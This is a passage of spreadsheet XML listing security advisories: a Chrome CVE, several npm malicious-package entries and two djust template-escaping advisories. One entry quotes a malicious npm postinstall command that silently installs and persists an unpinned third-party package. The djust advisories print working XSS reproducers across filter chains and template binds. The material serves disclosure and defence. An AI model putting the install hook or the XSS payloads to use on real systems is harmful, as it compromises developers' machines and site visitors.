      <c r="G1037" s="5" t="inlineStr"/>
      <c r="H1037" s="5" t="inlineStr"/>
      <c r="I1037" s="5" t="inlineStr"/>
      <c r="J1037" s="5" t="inlineStr"/>
      <c r="K1037" s="5" t="inlineStr"/>
      <c r="L1037" s="5" t="inlineStr"/>
      <c r="M1037" s="5" t="inlineStr"/>
      <c r="N1037" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1037" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P1037" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q1037" s="5" t="inlineStr"/>
      <c r="R1037" s="5" t="inlineStr">
        <is>
          <t>CWE-754</t>
        </is>
      </c>
      <c r="S1037" s="5" t="inlineStr">
        <is>
          <t>Improper state validation in Skia in Google Chrome prior to 153.0.8010.52 allowed a remote attacker to obtain cross-origin data via a crafted HTML page. (Chromium security severity: High)</t>
        </is>
      </c>
      <c r="T1037" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93387</t>
        </is>
      </c>
    </row>
    <row r="1038">
      <c r="A1038" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1038" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1038" s="5" t="inlineStr">
        <is>
          <t>GHSA-532p-c872-3926</t>
        </is>
      </c>
      <c r="D1038" s="5" t="inlineStr"/>
      <c r="E1038" s="5" t="inlineStr"/>
      <c r="F1038" s="5" t="inlineStr"/>
      <c r="G1038" s="5" t="inlineStr"/>
      <c r="H1038" s="5" t="inlineStr"/>
      <c r="I1038" s="5" t="inlineStr"/>
      <c r="J1038" s="5" t="inlineStr"/>
      <c r="K1038" s="5" t="inlineStr"/>
      <c r="L1038" s="5" t="inlineStr">
        <is>
          <t>npm:randompkga</t>
        </is>
      </c>
      <c r="M1038" s="5" t="inlineStr"/>
      <c r="N1038" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O1038" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P1038" s="5" t="inlineStr">
        <is>
          <t>2026-09-18</t>
        </is>
      </c>
      <c r="Q1038" s="5" t="inlineStr"/>
      <c r="R1038" s="5" t="inlineStr"/>
      <c r="S1038" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (c4e7dfd8fb150e4c7f087a17c2ed162a8e48fe7e4e253a68df901f0e775fd68c)
package.json declares a postinstall lifecycle script `cd "$INIT_CWD" &amp;&amp; npm i randompkgb` that, on `npm install`, installs the additional npm package `randompkgb` into the consumer's project. A companion postinstall.js reads the installer's own package.json at $INIT_CWD, sets `dependencies.randompkgb = "^1.0.0"`, and writes the manifest back to disk, persisting the injected dependency across future installs and CI runs. The caret range is unpinned, so any current or future version of `randompkgb` — whose code is not present in this package and is not controlled by the installer — will be resolved and executed on the installer's machine at install time and on `require`. This is dependency-tree hijacking: the mechanism drops attacker-controlled third-party code into the installer's environment and rewrites source-controlled project state to make the injection durable.
## Source: ghsa-malware (cfdfcd7cd3af1c7b280e6f13503a472f2b31582e239d6fac0b6cacc1709cf36f)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38" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-16255</t>
        </is>
      </c>
    </row>
    <row r="1039">
      <c r="A1039" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1039" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1039" s="5" t="inlineStr">
        <is>
          <t>GHSA-5r64-rpvg-q9rr</t>
        </is>
      </c>
      <c r="D1039" s="5" t="inlineStr"/>
      <c r="E1039" s="5" t="inlineStr"/>
      <c r="F1039" s="5" t="inlineStr"/>
      <c r="G1039" s="5" t="inlineStr"/>
      <c r="H1039" s="5" t="inlineStr"/>
      <c r="I1039" s="5" t="inlineStr"/>
      <c r="J1039" s="5" t="inlineStr"/>
      <c r="K1039" s="5" t="inlineStr"/>
      <c r="L1039" s="5" t="inlineStr">
        <is>
          <t>npm:kartykgithub-takedown-a</t>
        </is>
      </c>
      <c r="M1039" s="5" t="inlineStr"/>
      <c r="N1039" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O1039" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P1039" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q1039" s="5" t="inlineStr"/>
      <c r="R1039" s="5" t="inlineStr"/>
      <c r="S1039" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: ghsa-malware (be4b64316a832dd3482cc41c21d79e2005d5984e2458ed45e957ee761862de31)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39" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-16248</t>
        </is>
      </c>
    </row>
    <row r="1040">
      <c r="A1040" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1040" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1040" s="5" t="inlineStr">
        <is>
          <t>GHSA-9395-2g46-rj3f</t>
        </is>
      </c>
      <c r="D1040" s="5" t="inlineStr"/>
      <c r="E1040" s="5" t="inlineStr"/>
      <c r="F1040" s="5" t="inlineStr"/>
      <c r="G1040" s="5" t="inlineStr"/>
      <c r="H1040" s="5" t="inlineStr"/>
      <c r="I1040" s="5" t="inlineStr"/>
      <c r="J1040" s="5" t="inlineStr"/>
      <c r="K1040" s="5" t="inlineStr"/>
      <c r="L1040" s="5" t="inlineStr">
        <is>
          <t>PyPI:djust</t>
        </is>
      </c>
      <c r="M1040" s="5" t="inlineStr">
        <is>
          <t>1.1.1</t>
        </is>
      </c>
      <c r="N1040" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O1040" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P1040" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q1040" s="5" t="inlineStr"/>
      <c r="R1040" s="5" t="inlineStr"/>
      <c r="S1040" s="5" t="inlineStr">
        <is>
          <t>Five independent defects in djust's template auto-escaping cause attacker-controlled input to be rendered as live markup where Django escapes it. All four are present in shipped 1.1.0 and are fixed in 1.1.1.
They share one shape: **a filter or grant that escapes nothing itself and relies on the render-time auto-escape, which something downstream then removes.** They are grouped into a single advisory because the mitigation is identical — upgrade to 1.1.1 — and because no single one of them is meaningfully actionable in isolation.
## 1. `linenumbers` never escaped its input (#2291)
```
{{ p|linenumbers|safe }}   with p = '&lt;img src=x onerror=alert(1)&gt;'
  djust   '1. &lt;img src=x onerror=alert(1)&gt;'      &lt;- executes
  django  '1. &amp;lt;img src=x onerror=alert(1)&amp;gt;'
```
The filter deferred all escaping to render time; a trailing `|safe` suppressed exactly that. The exposure is wider than the `|safe` form: **any downstream filter that reads the output as markup is affected**, including `{{ p|linenumbers|truncatechars_html:"5" }}`, which contains no `|safe` at all.
## 2. `escape` was a no-op (#2281)
```
{{ p|escape|safe }}
  djust   '&lt;img src=x onerror=alert(1)&gt;'          &lt;- executes
  django  '&amp;amp;lt;img src=x onerror=alert(1)&amp;amp;gt;'
```
Django's `escape` is eager (`conditional_escape`, returning `SafeString`). djust's returned its input unchanged and let the render site escape it — indistinguishable for `{{ p|escape }}` alone, wrong for every chain. The security cell is `{{ p|escape|safe }}`: an idiom that reads as "escape it, then it is safe to emit" — which is what Django's semantics make true — was a bare `|safe` on attacker input. A sweep of every length-2 and length-3 chain containing `escape` found **104** live-markup cells.
## 3. `unordered_list` / `safeseq` handed a string back under a safe grant (#2274)
Both carry an unconditional "emit without escaping" grant, earned because they escape every item they emit. Given a **string** rather than a sequence they emitted nothing and returned the input verbatim under that same grant, making `{{ hostile|safeseq }}` an exact synonym for `|safe` with no `mark_safe` anywhere in the template.
## 4. A safety grant outlived the value it was granted for (#2300)
**No filter chain and no `|safe` anywhere; a bare `{{ p }}` is the whole reproducer.**
Safe context keys accumulated on the view and were never revoked, so a key marked safe once stayed safe for the lifetime of the view — which spans **every event on a WebSocket connection**:
```python
render 1:  p = mark_safe('&lt;b&gt;trusted&lt;/b&gt;')     -&gt;  '&lt;b&gt;trusted&lt;/b&gt;'   correct
render 2:  p = '&lt;img src=x onerror=alert(1)&gt;'  -&gt;  executes
```
A view that renders trusted markup into a variable and later renders user input into the same variable emits it live.
## 5. A custom tag handler's return was emitted raw — including djust's own `{% render_slot %}` (#2379)
**Reachable with no `|safe`, no `mark_safe`, and no application code: using component slots is enough.**
Django's `SimpleNode.render` runs `conditional_escape` over a `simple_tag`'s return
unless it carries `__html__`. djust inserted the return verbatim, so a handler as
ordinary as `return f"Hello {name}"` emitted attacker markup live.
Of the 221 handlers djust registers, one echoes a context value unescaped —
`render_slot`, the framework's own function-component/slot tag:
```
{% render_slot p %}     p = '&lt;img src=x onerror=alert(1)&gt;'
  djust   '&lt;img src=x onerror=alert(1)&gt;'          &lt;- executes
  django  '&amp;lt;img src=x onerror=alert(1)&amp;gt;'
```
Together with defect 3 this is one of the two classes reachable without the
application writing anything unusual.
## 6. `linebreaks` / `linebreaksbr` — and `|safe` was the only spelling that worked (#2284)
`linebreaks` emits `&lt;p&gt;`/`&lt;br&gt;` but neither escaped its content nor reported its
output safe. The plain spelling therefore escaped the filter's **own** tags and
printed a literal `&lt;p&gt;` on the page, so `|safe` was the only form that rendered
at all — and that form emitted the content live:
```
{{ bio|linebreaks }}         renders literal '&lt;p&gt;' text        (visibly broken)
{{ bio|linebreaks|safe }}    '&lt;img src=x onerror=alert(1)&gt;'    &lt;- executes
```
Because the broken spelling is the one a developer discards, the vulnerable
spelling is the one that ships. Any application rendering user-entered text with
paragraph breaks is written that way.
## Impact
Stored or reflected XSS in any djust application that renders untrusted input through the affected filters, or that reuses a context variable which was previously marked safe. Exploitation requires no special configuration. Defects 3, 4 and 5 require no unusual template construct at all — defect 5 needs only that the application use component slots, and defect 6's vulnerable spelling is the only one that renders correctly.
## Patches
Fixed in **1.1.1**, and in **1.2.0** (`main`).
1.1.1 re-implements each fix against 1.1.0's own code rather than back-porting `main`'s, which depends on a value-level safety model 1.1.0 does not have. Three consequences are documented in the 1.1.1 CHANGELOG and are all in the **over-escaping** direction: `{{ p|escape|F }}` double-escapes for a plain following filter `F`; `{% render_slot slot.content %}` over-escapes; and a `mark_safe`d value passed through `|escape` is escaped rather than passed through.
**Not fixed in 1.1.1**, and tracked separately: application-written tag handlers that return attacker data as a plain `str` (only djust's own `render_slot` is covered by defect 5), and a `{% with %}`/`{% for %}` bind inheriting a safety grant it never earned. Both are fixed in 1.2.0.
## Workarounds
None complete. Before upgrading, avoid `|safe` after any filter in a chain, avoid `safeseq`/`unordered_list` on values that may be strings, and avoid reusing a context variable for both `mark_safe` content and untrusted input.
## Credit
Found during an internal Django-parity audit by a registry-wide differential that compares djust's escaping capabilities against Django's across every filter chain, rather than by inspection.</t>
        </is>
      </c>
      <c r="T1040" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/GHSA-9395-2g46-rj3f</t>
        </is>
      </c>
    </row>
    <row r="1041">
      <c r="A1041" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1041" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1041" s="5" t="inlineStr">
        <is>
          <t>GHSA-cqc9-f5fp-r45q</t>
        </is>
      </c>
      <c r="D1041" s="5" t="inlineStr"/>
      <c r="E1041" s="5" t="inlineStr"/>
      <c r="F1041" s="5" t="inlineStr"/>
      <c r="G1041" s="5" t="inlineStr"/>
      <c r="H1041" s="5" t="inlineStr"/>
      <c r="I1041" s="5" t="inlineStr"/>
      <c r="J1041" s="5" t="inlineStr"/>
      <c r="K1041" s="5" t="inlineStr"/>
      <c r="L1041" s="5" t="inlineStr">
        <is>
          <t>npm:randompkgd</t>
        </is>
      </c>
      <c r="M1041" s="5" t="inlineStr"/>
      <c r="N1041" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O1041" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P1041" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q1041" s="5" t="inlineStr"/>
      <c r="R1041" s="5" t="inlineStr"/>
      <c r="S1041" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: ghsa-malware (c0ebd1d508d7c8ae4aa2a0693b9d07720a837307b1a5c343c931c6e7d72d6390)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1" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-16258</t>
        </is>
      </c>
    </row>
    <row r="1042">
      <c r="A1042" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1042" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1042" s="5" t="inlineStr">
        <is>
          <t>GHSA-f8wr-9w83-7gmw</t>
        </is>
      </c>
      <c r="D1042" s="5" t="inlineStr"/>
      <c r="E1042" s="5" t="inlineStr"/>
      <c r="F1042" s="5" t="inlineStr"/>
      <c r="G1042" s="5" t="inlineStr"/>
      <c r="H1042" s="5" t="inlineStr"/>
      <c r="I1042" s="5" t="inlineStr"/>
      <c r="J1042" s="5" t="inlineStr"/>
      <c r="K1042" s="5" t="inlineStr"/>
      <c r="L1042" s="5" t="inlineStr">
        <is>
          <t>npm:kartykgithub-takedown-b</t>
        </is>
      </c>
      <c r="M1042" s="5" t="inlineStr"/>
      <c r="N1042" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O1042" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P1042" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q1042" s="5" t="inlineStr"/>
      <c r="R1042" s="5" t="inlineStr"/>
      <c r="S1042" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: ghsa-malware (6844bb41cfa32b3ead1bd2558d13f9114c93fc9cea7be43ed4063726f259d405)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2" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-16249</t>
        </is>
      </c>
    </row>
    <row r="1043">
      <c r="A1043" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1043" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1043" s="5" t="inlineStr">
        <is>
          <t>GHSA-p8m5-fmxm-99f6</t>
        </is>
      </c>
      <c r="D1043" s="5" t="inlineStr"/>
      <c r="E1043" s="5" t="inlineStr"/>
      <c r="F1043" s="5" t="inlineStr"/>
      <c r="G1043" s="5" t="inlineStr"/>
      <c r="H1043" s="5" t="inlineStr"/>
      <c r="I1043" s="5" t="inlineStr"/>
      <c r="J1043" s="5" t="inlineStr"/>
      <c r="K1043" s="5" t="inlineStr"/>
      <c r="L1043" s="5" t="inlineStr">
        <is>
          <t>npm:randompkgc</t>
        </is>
      </c>
      <c r="M1043" s="5" t="inlineStr"/>
      <c r="N1043" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O1043" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P1043" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q1043" s="5" t="inlineStr"/>
      <c r="R1043" s="5" t="inlineStr"/>
      <c r="S1043" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: ghsa-malware (7ce22b64e51787a332ae7c65afc8789c0fb3f806199aa79d72af9ff02eb867d1)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3" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-16257</t>
        </is>
      </c>
    </row>
    <row r="1044">
      <c r="A1044" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1044" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1044" s="5" t="inlineStr">
        <is>
          <t>GHSA-p957-4pc7-x6hp</t>
        </is>
      </c>
      <c r="D1044" s="5" t="inlineStr"/>
      <c r="E1044" s="5" t="inlineStr"/>
      <c r="F1044" s="5" t="inlineStr"/>
      <c r="G1044" s="5" t="inlineStr"/>
      <c r="H1044" s="5" t="inlineStr"/>
      <c r="I1044" s="5" t="inlineStr"/>
      <c r="J1044" s="5" t="inlineStr"/>
      <c r="K1044" s="5" t="inlineStr"/>
      <c r="L1044" s="5" t="inlineStr">
        <is>
          <t>npm:kartykgithub-multiversion-a</t>
        </is>
      </c>
      <c r="M1044" s="5" t="inlineStr"/>
      <c r="N1044" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O1044" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P1044" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q1044" s="5" t="inlineStr"/>
      <c r="R1044" s="5" t="inlineStr"/>
      <c r="S1044" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: ghsa-malware (cf524b1c8a586bcece6d65140e168a40adec8699c1cc7af61263bfd2a6b84543)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4" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-16272</t>
        </is>
      </c>
    </row>
    <row r="1045">
      <c r="A1045" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1045" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1045" s="5" t="inlineStr">
        <is>
          <t>GHSA-q83w-3hvr-fgg7</t>
        </is>
      </c>
      <c r="D1045" s="5" t="inlineStr"/>
      <c r="E1045" s="5" t="inlineStr"/>
      <c r="F1045" s="5" t="inlineStr"/>
      <c r="G1045" s="5" t="inlineStr"/>
      <c r="H1045" s="5" t="inlineStr"/>
      <c r="I1045" s="5" t="inlineStr"/>
      <c r="J1045" s="5" t="inlineStr"/>
      <c r="K1045" s="5" t="inlineStr"/>
      <c r="L1045" s="5" t="inlineStr">
        <is>
          <t>npm:@kartyk-github-org/takedown-b</t>
        </is>
      </c>
      <c r="M1045" s="5" t="inlineStr"/>
      <c r="N1045" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O1045" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P1045" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q1045" s="5" t="inlineStr"/>
      <c r="R1045" s="5" t="inlineStr"/>
      <c r="S1045" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: ghsa-malware (f59dc68aae74875f986021660cb054d4055e7f7113e31234e8a9589c44edfb6f)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5" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-16266</t>
        </is>
      </c>
    </row>
    <row r="1046">
      <c r="A1046" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1046" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1046" s="5" t="inlineStr">
        <is>
          <t>GHSA-rc4q-v4pf-8j7x</t>
        </is>
      </c>
      <c r="D1046" s="5" t="inlineStr"/>
      <c r="E1046" s="5" t="inlineStr"/>
      <c r="F1046" s="5" t="inlineStr"/>
      <c r="G1046" s="5" t="inlineStr"/>
      <c r="H1046" s="5" t="inlineStr"/>
      <c r="I1046" s="5" t="inlineStr"/>
      <c r="J1046" s="5" t="inlineStr"/>
      <c r="K1046" s="5" t="inlineStr"/>
      <c r="L1046" s="5" t="inlineStr">
        <is>
          <t>npm:randompkge</t>
        </is>
      </c>
      <c r="M1046" s="5" t="inlineStr"/>
      <c r="N1046" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O1046" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P1046" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q1046" s="5" t="inlineStr"/>
      <c r="R1046" s="5" t="inlineStr"/>
      <c r="S1046" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: ghsa-malware (95eb389e78a05b76dfefafd460f3280f3fabf8fcd1dfc55946b04bef84b26116)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6" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-16259</t>
        </is>
      </c>
    </row>
    <row r="1047">
      <c r="A1047" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1047" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1047" s="5" t="inlineStr">
        <is>
          <t>GHSA-rx76-mcg9-gqc5</t>
        </is>
      </c>
      <c r="D1047" s="5" t="inlineStr"/>
      <c r="E1047" s="5" t="inlineStr"/>
      <c r="F1047" s="5" t="inlineStr"/>
      <c r="G1047" s="5" t="inlineStr"/>
      <c r="H1047" s="5" t="inlineStr"/>
      <c r="I1047" s="5" t="inlineStr"/>
      <c r="J1047" s="5" t="inlineStr"/>
      <c r="K1047" s="5" t="inlineStr"/>
      <c r="L1047" s="5" t="inlineStr">
        <is>
          <t>npm:@kartyk-github-org/takedown-a</t>
        </is>
      </c>
      <c r="M1047" s="5" t="inlineStr"/>
      <c r="N1047" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O1047" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P1047" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q1047" s="5" t="inlineStr"/>
      <c r="R1047" s="5" t="inlineStr"/>
      <c r="S1047" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: ghsa-malware (bf2fb1adf14524d97cbb2a621413f9d25b8ac020fc927b92fa8f9aff52edef70)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7" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-16265</t>
        </is>
      </c>
    </row>
    <row r="1048">
      <c r="A1048" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1048" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1048" s="5" t="inlineStr">
        <is>
          <t>GHSA-vxvv-gh3g-35pj</t>
        </is>
      </c>
      <c r="D1048" s="5" t="inlineStr"/>
      <c r="E1048" s="5" t="inlineStr"/>
      <c r="F1048" s="5" t="inlineStr"/>
      <c r="G1048" s="5" t="inlineStr"/>
      <c r="H1048" s="5" t="inlineStr"/>
      <c r="I1048" s="5" t="inlineStr"/>
      <c r="J1048" s="5" t="inlineStr"/>
      <c r="K1048" s="5" t="inlineStr"/>
      <c r="L1048" s="5" t="inlineStr">
        <is>
          <t>npm:randompkgb</t>
        </is>
      </c>
      <c r="M1048" s="5" t="inlineStr"/>
      <c r="N1048" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O1048" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P1048" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q1048" s="5" t="inlineStr"/>
      <c r="R1048" s="5" t="inlineStr"/>
      <c r="S1048" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: ghsa-malware (5daf14ba0ddb406ffdd9b17e6be63713fe9f66cf739753e8b20ffb128a8b1323)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8" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-16256</t>
        </is>
      </c>
    </row>
    <row r="1049">
      <c r="A1049" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1049" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1049" s="5" t="inlineStr">
        <is>
          <t>GHSA-xjw9-38cr-6372</t>
        </is>
      </c>
      <c r="D1049" s="5" t="inlineStr"/>
      <c r="E1049" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1049" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G1049" s="5" t="inlineStr"/>
      <c r="H1049" s="5" t="inlineStr"/>
      <c r="I1049" s="5" t="inlineStr"/>
      <c r="J1049" s="5" t="inlineStr"/>
      <c r="K1049" s="5" t="inlineStr"/>
      <c r="L1049" s="5" t="inlineStr">
        <is>
          <t>PyPI:djust</t>
        </is>
      </c>
      <c r="M1049" s="5" t="inlineStr">
        <is>
          <t>1.1.2</t>
        </is>
      </c>
      <c r="N1049" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O1049" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P1049" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q1049" s="5" t="inlineStr"/>
      <c r="R1049" s="5" t="inlineStr"/>
      <c r="S1049" s="5" t="inlineStr">
        <is>
          <t>A context safety grant was inherited by a template **binding** that never earned it, so rebinding a name the view had marked safe left the mark attached to the new, attacker-controlled value.
djust's context safety channel is keyed by **name**, not by value. Every bind copied the value and left the grant in place:
```
view marks   p = mark_safe('&lt;b&gt;trusted&lt;/b&gt;')
template     {% with p=user_input %}{{ p }}{% endwith %}
  djust   '&lt;img src=x onerror=alert(1)&gt;'          &lt;- executes
  django  '&amp;lt;img src=x onerror=alert(1)&amp;gt;'
```
## Affected binds
Eight distinct shapes were live. All are fixed in 1.1.2:
| shape | example |
|---|---|
| `{% with %}` rebinding a marked name | `{% with p=hostile %}{{ p }}{% endwith %}` |
| `{% with %}` **descendant** of a rebound name | `{% with p=hostile %}{{ p.a }}{% endwith %}` |
| `{% with %}` binding over a marked name | `{% with q=hostile %}{{ q }}{% endwith %}` |
| `{% for %}` loop variable | `{% for p in hostiles %}{{ p }}{% endfor %}` |
| `{% for %}` descendant | `{% for p in hostiles %}{{ p.a }}{% endfor %}` |
| `{% for %}` tuple unpacking | `{% for k, v in rows %}{{ v }}{% endfor %}` |
| `{% include … with %}` | `{% include "c.html" with q=hostile %}` |
| assign tags | `{% … as x %}` |
No filter chain and no `|safe` anywhere in the template is required. The precondition is that the application marked *some* value safe under a name that a template later rebinds — an ordinary pattern, since a view commonly marks trusted markup safe and templates commonly reuse short names such as `p`, `item` or `row`.
## Impact
Stored or reflected XSS in any djust application that combines `mark_safe` (or any framework path that grants a context key safety) with a template that rebinds that name. Exploitation requires no unusual template construct.
## Patches
Fixed in **1.1.2**, and in 1.2.0 (`main`).
The rule is that a bind **replaces** the grant rather than inheriting one. It is stated that way deliberately: the originally reported defects pointed the *opposite* direction — a grant being **lost** across some binds, causing over-escaping — and fixing only the reported direction would have left this leak in place. Both directions are the same rule.
**Not fixed in 1.1.2**, and tracked for 1.2.0: two over-escaping cases where a grant fails to travel with a value that legitimately carries one (`{% with body=post.text|linebreaks %}`, and `mark_safe` reaching a template through `dict.values` / `dict.items`). Both escape *more* than Django rather than less, so neither is a leak.
## Workarounds
Before upgrading, avoid reusing a context name for both `mark_safe`'d content and untrusted input, and avoid rebinding such a name in `{% with %}`, `{% for %}`, `{% include … with %}` or an assign tag.
## Credit
Found while preparing the 1.1.1 security release: the reproducer published in GHSA-9395-2g46-rj3f was run against the built 1.1.1 artifact before that advisory was published, and proved the class was still live. Publishing the original text would have reported this class as patched when it was not.</t>
        </is>
      </c>
      <c r="T1049" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/GHSA-xjw9-38cr-6372</t>
        </is>
      </c>
    </row>
    <row r="1050">
      <c r="A1050" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1050" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1050" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-16250</t>
        </is>
      </c>
      <c r="D1050" s="5" t="inlineStr"/>
      <c r="E1050" s="5" t="inlineStr"/>
      <c r="F1050" s="5" t="inlineStr"/>
      <c r="G1050" s="5" t="inlineStr"/>
      <c r="H1050" s="5" t="inlineStr"/>
      <c r="I1050" s="5" t="inlineStr"/>
      <c r="J1050" s="5" t="inlineStr"/>
      <c r="K1050" s="5" t="inlineStr"/>
      <c r="L1050" s="5" t="inlineStr">
        <is>
          <t>PyPI:marketing-mcp</t>
        </is>
      </c>
      <c r="M1050" s="5" t="inlineStr"/>
      <c r="N1050" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
